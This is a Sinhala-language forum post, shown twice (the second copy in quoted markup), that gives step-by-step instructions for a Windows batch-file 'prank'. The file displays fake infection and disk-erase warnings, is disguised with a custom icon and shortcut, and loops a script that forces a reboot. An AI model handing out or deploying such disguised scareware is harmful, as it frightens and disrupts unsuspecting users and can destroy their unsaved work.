Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
Premium Land with House for Sale
anil1961
Updated:
Friday at 10:15 AM
AWS Certified Solutions Architect-Associate + AWS Certified Cloud Practitioner
Sanjeewani95
Updated:
Aug 19, 2026
🚀 එක පැකේජ් එකයි - මාසෙටම Unlimited Internet! 🌐
sayuru bandara
Updated:
Aug 18, 2026
🎬 CapCut Pro 1 Month Access! LKR 600
sayuru bandara
Updated:
Aug 18, 2026
🚀 Google One AI PRO Plan (Gemini Pro Activation) – 18 Months Access! LKR 2200
sayuru bandara
Updated:
Aug 18, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
General
ElaKiri Talk!
Computer ජිල්මාට් දෙන්න කැමති එවුන්ට -Hacking වගේ ලේසි එ&#
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser

Message

Computer ජිල්මාට් දෙන්න කැමති එවුන්ට -Hacking වගේ ලේසි එ&#

Rep+ දුන්න අයට පිං පිණිස . තව Rep + ගැනීමේ අභිලාෂයෙන් ලියමි.

අද අපි කරන්න යන්නෙ ප්රෝග්රෑම් එකක් හදන්න වෛරස් එකක් වගේ වැඩ කරන ..එත් බයවෙන්න එපා මේක වෛරස් එකක් නෙවේ PC එකට කිසි හානියක් මේකෙන් වෙන්නේ නැ

මේක ක්ලික් කලාම බ්ලෑන්ක් ස්ක්රීන් එකක් ඇවිත් කියනවා Virus Detected ඒ නිසා වින්ඩෝස් රිස්ටෝර් කරන්න හාඩ් ඩිස්ක් එක ෆෝමැට් කරන්න වෙනව කියල

මෙන්න මේ කෝඩ් එක නෝට්පෑඩ් (notepad) එකේ paste කරගන්න .

@echo off

echo Access Denied! Your Computer is infected

echo -

echo Do not attempt to quit.

PAUSE

echo System check

echo -

echo CHECKING FOR POWER

PAUSE

echo -

echo Power - FAILED

PAUSE

echo -

echo CHECKING FOR RAM

PAUSE

echo -

echo RAM - FAILING

PAUSE

echo -

echo CHECKING FOR ANTIVIRUS UPDATES

PAUSE

echo -

echo UPDATE FAILURE

echo -

PAUSE

echo Breach of IP adress

echo -

echo Firewall - FAILED

echo -

PAUSE echo Virus attaining: 192.168.XX.X

echo -

echo Hard drive must be erased and rebooted to resume windows.

echo -

PAUSE

echo -

echo Starting to reboot hardrive.

echo -

echo Restart after 2 minutes approximately.

echo -

echo Vsit http://Handyhost.net For More.

PAUSE

:START

start troubleshooting.bat

GOTO START.

මේක prank.batයනුවෙන් Save කරන්න.

දැන් ඉතින් Google Images වලට ගිහින් මොනාහරි Icon එකක රුපයක් ගන්න.

icon එක තියන ෆෝමැට් එක වෙනස් කරන්න අපට ඔන්ලයින් .ICO කන්වර්ටරයක් වන icoconverter භාවිතා කල හැක .

දැන් prank.bat ෆයිල් එකේ ඉමේජ් එක මාරු කරන්න . එහෙම කරන්න නම් ෆයිල් එක C: හාඩ් එකට paste කරගන්න. දැන් C: හි තියෙන prank.bat ෆයිල් එක මත රයිට් ක්ලික් කර Create Shortcut  කියන එක Select කරගන්න ඊට පස්සේ ඒ Shortcut එක Desktop එකට paste කරගන්න.

ඒ paste කරගත්ත  prank.bat ෆයිල් එක මත රයිට් ක්ලික් කර properties ගොස් එහි customize එකට ගොස් කලින් Download කරගත්ත .ICON ෆයිල් එක Browse කරගන්න. දැන් ඉතින් Run කරන්න තමයි තියෙන්නෙ .

Run කරන්න කලින් තව ෆයිල් එකක් හදාගන්න ඕනේ එකත් .bat ෆයිල් එකක්ම තමයි.

මෙන්න මේ කෝඩ් එකත් නෝට්පෑඩ් (notepad) එකේ paste කරගන්න .

Shutdown -R -T 20 -C

මේකත් Desktop එකේ කොහේ හරි Save කරගන්න troubleshooting.bat කියල.

දැන් වැඩේ හරි Run කරලා බලන්න

Post එකට කැමතිනම් Rep +එකක් දාන්න.

[QUOTE="aliman, post: 17869949, member: 156430"] [b]Computer ජිල්මාට් දෙන්න කැමති එවුන්ට -Hacking වගේ ලේසි එ&#[/b] [SIZE=6]Rep+ [/SIZE][COLOR=Blue]දුන්න අයට පිං පිණිස . තව Rep + ගැනීමේ අභිලාෂයෙන් ලියමි. [/COLOR]:) [SIZE=4][COLOR=DarkRed]අද අපි කරන්න යන්නෙ ප්රෝග්රෑම් එකක් හදන්න වෛරස් එකක් වගේ වැඩ කරන ..එත් බයවෙන්න එපා මේක වෛරස් එකක් නෙවේ PC එකට කිසි හානියක් මේකෙන් වෙන්නේ නැ [/COLOR][/SIZE] [SIZE=4][COLOR=DarkRed] [/COLOR][/SIZE][SIZE=4][COLOR=DarkRed]මේක ක්ලික් කලාම බ්ලෑන්ක් ස්ක්රීන් එකක් ඇවිත් කියනවා Virus Detected ඒ නිසා වින්ඩෝස් රිස්ටෝර් කරන්න හාඩ් ඩිස්ක් එක ෆෝමැට් කරන්න වෙනව කියල [/COLOR][/SIZE] [SIZE=4][COLOR=DarkRed] [/COLOR][/SIZE][SIZE=4][COLOR=DarkRed]මෙන්න මේ කෝඩ් එක නෝට්පෑඩ් (notepad) එකේ paste කරගන්න .[/COLOR][/SIZE] [COLOR=#00BFFF]@echo off echo Access Denied! Your Computer is infected echo - echo Do not attempt to quit. PAUSE echo System check echo - echo CHECKING FOR POWER PAUSE echo - echo Power - FAILED PAUSE echo - echo CHECKING FOR RAM PAUSE echo - echo RAM - FAILING PAUSE echo - echo CHECKING FOR ANTIVIRUS UPDATES PAUSE echo - echo UPDATE FAILURE echo - PAUSE echo Breach of IP adress echo - echo Firewall - FAILED echo - PAUSE echo Virus attaining: 192.168.XX.X echo - echo Hard drive must be erased and rebooted to resume windows. echo - PAUSE echo - echo Starting to reboot hardrive. echo - echo Restart after 2 minutes approximately. echo - echo Vsit[URL="http://handyhost.net"] http://Handyhost.net [/URL]For More. PAUSE :START start troubleshooting.bat GOTO START.[/COLOR] මේක [COLOR=RED]prank.bat[/COLOR]යනුවෙන් Save කරන්න. දැන් ඉතින් Google Images වලට ගිහින් මොනාහරි Icon එකක රුපයක් ගන්න. icon එක තියන ෆෝමැට් එක වෙනස් කරන්න අපට ඔන්ලයින් [COLOR=RED].ICO[/COLOR] කන්වර්ටරයක් වන icoconverter භාවිතා කල හැක . දැන් [COLOR=RED]prank.bat[/COLOR] ෆයිල් එකේ ඉමේජ් එක මාරු කරන්න . එහෙම කරන්න නම් ෆයිල් එක [COLOR=RED]C: [/COLOR]හාඩ් එකට [COLOR=RED]paste[/COLOR] කරගන්න. දැන්[COLOR=RED] C: [/COLOR]හි තියෙන [COLOR=RED]prank.bat [/COLOR]ෆයිල් එක මත රයිට් ක්ලික් කර [COLOR=RED]Create Shortcut [/COLOR] කියන එක[COLOR=RED] Select[/COLOR] කරගන්න ඊට පස්සේ ඒ [COLOR=RED]Shortcut[/COLOR] එක[COLOR=RED] Desktop [/COLOR]එකට [COLOR=RED]paste[/COLOR] කරගන්න. ඒ [COLOR=RED]paste[/COLOR] කරගත්ත [COLOR=RED] prank.bat[/COLOR] ෆයිල් එක මත රයිට් ක්ලික් කර [COLOR=RED]properties [/COLOR]ගොස් එහි [COLOR=RED]customize[/COLOR] එකට ගොස් කලින් Download කරගත්ත .ICON ෆයිල් එක [COLOR=RED]Browse [/COLOR]කරගන්න. දැන් ඉතින් Run කරන්න තමයි තියෙන්නෙ . Run කරන්න කලින් තව ෆයිල් එකක් හදාගන්න ඕනේ එකත් [COLOR=RED].bat[/COLOR] ෆයිල් එකක්ම තමයි. මෙන්න මේ කෝඩ් එකත් නෝට්පෑඩ් (notepad) එකේ paste කරගන්න . [COLOR=#00BFFF] Shutdown -R -T 20 -C [/COLOR] මේකත්[COLOR=RED] Desktop එකේ කොහේ හරි[COLOR=RED] Save [/COLOR][/COLOR]කරගන්න[COLOR=RED] troubleshooting.bat[/COLOR] කියල. දැන් වැඩේ හරි Run කරලා බලන්න [CENTER][SIZE=08][B] Post එකට කැමතිනම් Rep +එකක් දාන්න.[/B][/SIZE][/CENTER] [/QUOTE]
Insert quotes…
Verification
Asuwa dahayen wadi kalama keeyada?
Post reply
Top
Bottom